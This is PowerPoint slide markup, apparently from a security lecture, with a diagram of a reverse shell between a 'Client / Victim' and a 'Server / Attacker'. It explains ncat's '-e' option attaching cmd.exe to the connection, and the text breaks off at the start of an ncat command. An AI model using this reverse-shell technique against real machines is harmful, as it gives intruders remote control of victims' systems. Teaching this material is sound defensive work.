            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Shape 213"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="12026615" y="6185254"/>
              <a:ext cx="1092679" cy="38024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7" name="Shape 214"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12117936" y="7804899"/>
              <a:ext cx="838107" cy="523630"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8298014" y="6294553"/>
              <a:ext cx="2390972"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39" name="Shape 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8233576" y="8233479"/>
              <a:ext cx="2519848" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Shape 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8901674" y="4947656"/>
              <a:ext cx="1379383" cy="1529499"/>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dirty="0" err="1"/>
                <a:t>tcp</a:t>
              </a:r>
              <a:endParaRPr sz="3377" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Shape 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9012254" y="8141006"/>
              <a:ext cx="1379383" cy="1529499"/>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sz="1900" b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800" b="0"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3377"/>
                <a:t>tcp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13351927" y="6095079"/>
              <a:ext cx="3841634" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>puts input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Shape 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13246136" y="7266198"/>
              <a:ext cx="4764401" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>receive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2133" dirty="0"/>
                <a:t> output</a:t>
              </a:r>
              <a:endParaRPr sz="2133" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9675751" y="3705465"/>
            <a:ext cx="1357165" cy="870848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774914" y="4722416"/>
            <a:ext cx="851932" cy="674832"/>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b="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9800404" y="4675773"/>
            <a:ext cx="1097577" cy="674832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Attacker </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for attack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14445" y="1514459"/>
            <a:ext cx="990052" cy="990052"/>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Arrow Connector 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1026" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1561278" y="2009485"/>
            <a:ext cx="3353167"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74914" y="1985521"/>
            <a:ext cx="3100220" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Let a victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a signal to activate the communication channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7793921" y="1809876"/>
            <a:ext cx="3132976" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to a hidden communication channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5939975" y="2009485"/>
            <a:ext cx="4112859" cy="1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1AF44B25-39B4-EDD2-4140-16B3F7C3CE8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1836292" y="4126517"/>
            <a:ext cx="7753680" cy="1369800"/>
            <a:chOff x="1836292" y="4126517"/>
            <a:chExt cx="7753680" cy="1369800"/>
          </a:xfrm>
        </p:grpSpPr>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BF9FB33B-E9EA-E8FB-D34D-41695C035B55}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1836292" y="4249637"/>
                <a:ext cx="7681680" cy="971280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9FB33B-E9EA-E8FB-D34D-41695C035B55}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1818292" y="4231997"/>
                  <a:ext cx="7717320" cy="1006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147A0012-B335-1771-B812-93AD13ED98B3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9307732" y="4126517"/>
                <a:ext cx="282240" cy="327960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="5" name="Ink 4">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{147A0012-B335-1771-B812-93AD13ED98B3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9289732" y="4108517"/>
                  <a:ext cx="31788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4579FA74-FCDA-31DA-502D-352D9E90BA49}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7619692" y="5353397"/>
                <a:ext cx="360" cy="102600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="6" name="Ink 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4579FA74-FCDA-31DA-502D-352D9E90BA49}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7601692" y="5335397"/>
                  <a:ext cx="3600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3F5A0F89-9C55-CFE0-5C5F-FF2FF6652324}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7494772" y="5243597"/>
                <a:ext cx="437040" cy="252720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F5A0F89-9C55-CFE0-5C5F-FF2FF6652324}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7476772" y="5225597"/>
                  <a:ext cx="472680" cy="288360"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527AD5DD-B295-2283-C83A-4CCA76091787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1685812" y="2961197"/>
            <a:ext cx="7528320" cy="735840"/>
            <a:chOff x="1685812" y="2961197"/>
            <a:chExt cx="7528320" cy="735840"/>
          </a:xfrm>
        </p:grpSpPr>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EBE43208-63F1-0F25-9853-8A3970CEA455}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1798132" y="2961197"/>
                <a:ext cx="7416000" cy="689040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="9" name="Ink 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE43208-63F1-0F25-9853-8A3970CEA455}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1780492" y="2943197"/>
                  <a:ext cx="7451640" cy="724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DA560197-D065-9045-D9BD-8A5FDAC98D00}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1685812" y="3430637"/>
                <a:ext cx="260640" cy="266400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="10" name="Ink 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA560197-D065-9045-D9BD-8A5FDAC98D00}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId17"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1667812" y="3412997"/>
                  <a:ext cx="296280" cy="302040"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{334429DB-D5AE-4151-27CC-E1B608364EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6009412" y="2414357"/>
            <a:ext cx="439560" cy="385200"/>
            <a:chOff x="6009412" y="2414357"/>
            <a:chExt cx="439560" cy="385200"/>
          </a:xfrm>
        </p:grpSpPr>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9990DE07-2B7F-B1C6-458F-62A54B9D7768}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6118852" y="2561957"/>
                <a:ext cx="175320" cy="185040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="12" name="Ink 11">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9990DE07-2B7F-B1C6-458F-62A54B9D7768}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6101212" y="2544317"/>
                  <a:ext cx="21096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28FF1866-BB77-C985-BA9D-746090F9E9FC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6009412" y="2414357"/>
                <a:ext cx="439560" cy="385200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FF1866-BB77-C985-BA9D-746090F9E9FC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5991412" y="2396357"/>
                  <a:ext cx="475200" cy="420840"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Right Arrow 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8730BDB-793B-1014-8282-8B952393E214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237964" y="5994394"/>
            <a:ext cx="2631367" cy="14911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n>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CC032C4-89B7-DB99-ABC3-16D128B777F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835276" y="5584025"/>
            <a:ext cx="1811009" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43"/>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270554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80928" y="2045241"/>
            <a:ext cx="4166329" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: program to execute after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>connection occurs., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>connecting STDIN and STDOUT to the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: a shell command for Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6985048" y="5692495"/>
            <a:ext cx="4675064" cy="376966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="36363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95220" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
